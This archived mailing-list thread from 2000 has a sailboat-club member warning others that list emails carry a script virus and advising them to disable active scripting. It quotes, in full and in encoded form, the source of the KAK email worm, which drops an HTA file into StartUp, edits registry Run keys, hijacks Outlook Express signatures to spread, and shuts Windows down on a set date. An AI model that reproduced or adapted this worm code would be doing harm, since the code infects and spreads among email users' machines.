Virus (was Re: [alberg30] A30 article-huge file)

George Dinwiddie gdinwiddie at min.net
Sat Apr 15 17:38:04 PDT 2000 

Joe,

I don't use Outlook Express, so I can't give you a step-by-step
instruction.  Look for a menu item labeled "options" or 
"preferences" or something like that.  In there, look for
something mentioning "active scripting" and disable it.
Also, see my other message on where to find the patch to
this security hole.

 - George

alberg30 wrote:
> 
> George, how do I turn off scripts? Althougg I got an email msg that said
> there was a virus in the email I sent,  I have done a virus scan of my
> hard drive but show no sign of the virus. What gives?
> 
> ----- Original Message -----
> From: George Dinwiddie <gdinwiddie at min.net>
> To: <alberg30 at egroups.com>
> Cc: <support at egroups.com>
> Sent: Friday, April 14, 2000 8:45 PM
> Subject: Virus (was Re: [alberg30] A30 article-huge file)
> 
> > Joe,
> >
> > Your email contained the same virus that appeared in Towney's
> > email on the A30 list.  It shows up right above the ad banner
> > in the HTML source.  I'm beginning to think that perhaps it's
> > not your machine and Towney's machine, but egroups' server
> > that's infected.
> >
> > Please, everyone make sure that scripts are turned off in your
> > email software.  I can't imagine any reason you'd want an
> > email to automatically run something on your machine.
> >
> >  - George
> >
> >
> > --------------script source--------------
> > function sErr(){return
> > true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z=
> > <HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION
> > ID=3D\"hO=
> > \" WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object
> > id=3D'w=
> > sh'
> >
> classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCR=
> > IPT>function sEr(){self.close();return
> > true;}window.onerror=3DsEr;fs=3Dnew =
> >
> ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=
> 3Df=
> > s.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var
> > mye=3D=
> > new
> > Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew
> =
> >
> String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD
> =C9=
> >
> ~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\
> \\\=
> >
> StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists(
> kfr=
> > ))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.File
> Exist=
> >
> s(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs.GetF
> ile=
> >
> (aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr)?wd+'M
> ENU=
> > D=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('@echo
> > off>'+=
> > pth);t1.WriteLine('del
> > '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFi=
> >
> le(kk,k2);fs.GetFile(k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.
> reg=
> >
> ');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\
> \\I=
> > dentities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
> > Express\\\\5.0';sg=
> > =3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default
> > Signature\"=
> >
> =3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000
> ]')=
> > ;t2.WriteLine('\"name\"=3D\"Signature
> > #1\"');t2.WriteLine('\"type\"=3Ddword=
> >
>:00000002');t2.WriteLine('\"text\"=3D\"\"');t2.Write('\"file\"=3D\"C:\\\
> \\\=
> >
> \\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');
> t2.=
> > Write('\"Signature
> > Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.Writ=
> >
> eLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Curren
> tVe=
> >
> rsion\\\\Run]');t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\
> \\\=
> >
> \\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit
> .ex=
> > e -s
> >
> '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML=
> > ><BODY><DIV
> style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OB=
> > JECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC
> > id=3Dscr></"+"OBJ=
> >
> ECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read(1)!=3D'Z');t3.W
> rit=
> > eLine('<SCRIPT><!--');t3.write('function sErr(){return
> > true;}window.onerror=
> >
> =3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095);t4.close();rd=3D/
> \\\=
> >
> \/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\\\').replace(re,'\
> \\\=
> >
> \"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=3D(navigator.system
> Lan=
> >
> guage)?navigator.systemLanguage:navigator.language;scr.Path=3D(la=3D=3D\
> "fr=
> > \")?\"C:\\\\\\\\windows\\\\\\\\Menu
> > D=E9marrer\\\\\\\\Programmes\\\\\\\\D=
> > =E9marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start
> > Menu\\\\\\\\Pr=
> >
> ograms\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.userAgent.toLower
> Cas=
> >
> e();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigator.appVersion)>4
> ))|=
> > |(agt.indexOf(\"msie
> > 5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCR=
> >
> IPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd
> +'k=
> > ak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew
> > Date();if(d.get=
> > Date()=3D=3D1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not
> > today =
> > !');wsh.Run(wd+'RUNDLL32.EXE
> > user.exe,exitwindows');}self.close();</"+"SCRI=
> > PT>S3 driver memory alloc failed  
> > !]]%%%%%</"+"BODY></"+"HTML>";la=3D=
> >
> (navigator.systemLanguage)?navigator.systemLanguage:navigator.language;s
> cr.=
> > Path=3D(la=3D=3D"fr")?"C:\\windows\\Menu
> > D=E9marrer\\Programmes\\D=E9marrag=
> > e\\kak.hta":"C:\\windows\\Start
> > Menu\\Programs\\StartUp\\kak.hta";agt=3Dnav=
> >
> igator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=3D-1)&&(parseIn
> t(n=
> > avigator.appVersion)>4))||(agt.indexOf("msie 5.")!=3D-1))scr.write();
> >
> > ----------------------------------------------------------------------
> --
> > You can win $1000!
> > Time-limited offer.  Enter today at:
> > http://click.egroups.com/1/2864/5/_/476031/_/955762890/
> > ----------------------------------------------------------------------
> --
> >
> >
> 
> ------------------------------------------------------------------------
> Get your bargains at AndysGarage.com!
> http://click.egroups.com/1/2579/5/_/476031/_/955764082/
> ------------------------------------------------------------------------

------------------------------------------------------------------------
High rates giving you headaches? The 0% APR Introductory Rate from 
Capital One. 9.9% Fixed thereafter!
http://click.egroups.com/1/3010/5/_/476031/_/955845254/
------------------------------------------------------------------------


 955845484.0

More information about the Public-List mailing list